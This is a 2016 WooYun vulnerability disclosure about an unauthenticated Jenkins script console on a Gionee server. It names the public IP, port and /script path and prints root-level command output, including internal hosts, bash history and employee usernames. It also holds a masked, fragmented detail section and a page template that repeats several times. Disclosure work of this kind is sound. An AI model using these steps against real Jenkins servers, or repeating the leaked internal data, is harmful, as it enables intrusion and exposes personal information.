金立手机某系统未授权访问导致命令执行/root权限

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0182909

漏洞标题：金立手机某系统未授权访问导致命令执行/root权限

漏洞作者：路人甲

提交时间：2016-03-10 12:45

修复时间：2016-04-24 14:11

公开时间：2016-04-24 14:11

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-03-10：细节已通知厂商并且等待厂商处理中
2016-03-10：厂商已经确认，细节仅向厂商公开
2016-03-20：细节向核心白帽子及相关领域专家公开
2016-03-30：细节向普通白帽子公开
2016-04-09：细节向实习白帽子公开
2016-04-24：细节向公众公开

简要描述：

详细说明：

mask 区域

1.http://**.**.**/bugs/wooyun-2016-0179640_
*****。^*****
**********
*****授权*****
2.http://**.**.**/_
**********
*****86d1222f3292ca73467f.png&qu*****
**********
*****^^^*****
3.http://**.**.**/script_
**********
*****^^^*****
*****5b9087df5140a1175def.png&qu*****
**********
*****c/ho*****
**********
*****3acc29caad88758e5ccb.png&qu*****
**********
***** following line,*****
*****functionalit*****
***** loca*****
*****aldomain6 *****
*****est-perf*****
*****est-perft*****
**********
***** ptest.g*****
**********
*****.ptest.gi*****
*****sets.ptes*****
*****rdzb4pZ&lt*****
**********
*****istory (^*****
**********
*****;#1456*****
*****x.co*****
*****140*****
*****l*****
*****140*****
*****nf.*****
*****140*****
*****l*****
*****140*****
*****st.gion*****
*****140*****
*****t.gione*****
*****140*****
*****!*****
*****140*****
*****code&*****
**********
*****ome*****
*****gt;ch*****
*****wb*****
*****nw*****
*****ch*****
*****gw*****
*****enx*****
*****gx*****
*****ngw*****
*****pe*****
*****io*****
*****ro*****
*****gh*****
*****gy*****
*****w*****
*****lo*****
*****ro*****
*****nli*****
*****kj*****
*****jy*****
*****t;/co*****
**********
**********
*****^^所谓^*****

漏洞证明：

WooYun: 金立手机某系统存在命令执行漏洞root权限/一大波项目源码
第二弹。。。
jenkins 未授权访问
http://120.26.232.224:8000/

命令执行url
http://120.26.232.224:8000/script
root权限

cat /etc/hosts

# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost
::1		localhost6.localdomain6 localhost6
10.200.137.76 test-perftest-s-03
#42.121.110.227 test-perftest-s-03
#42.121.110.227 ptest.gionee.com
#10.200.137.76 3g.ptest.gionee.com
#10.200.137.76 assets.ptest.gionee.com
10.117.67.237 iZ23jrdzb4pZ

cat /root/.bash_history (部分内容)

#1456140295
vi nginx.conf
#1456140321
ll
#1456140325
cd conf.d/
#1456140326
ll
#1456140330
vi assets.ptest.gionee.com 
#1456140343
cat a.3g.ptest.gionee.com 
#1456140351
q!
#1456140352
exit

ls /home

chendy
daiwb
duanwm
fanch
fangwei
fengwenxing
kongxh
lujiangwei
luopeng
nagios
qinrong
wanghj
wangyy
www
wwwlogs
wwwroot
xieminliang
xuekj
yinjy
zhanggq

内网不内网的无所谓的 aliyun主机

修复方案：

jenkins 未授权访问

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2016-03-10 14:11

厂商回复：

谢谢。已经通知相关部门同事

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0182909

漏洞标题：金立手机某系统未授权访问导致命令执行/root权限

相关厂商：gionee.com

漏洞作者：路人甲

提交时间：2016-03-10 12:45

修复时间：2016-04-24 14:11

公开时间：2016-04-24 14:11

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0182909

漏洞标题：金立手机某系统未授权访问导致命令执行/root权限

相关厂商：gionee.com

漏洞作者： 路人甲

提交时间：2016-03-10 12:45

修复时间：2016-04-24 14:11

公开时间：2016-04-24 14:11

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0182909"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云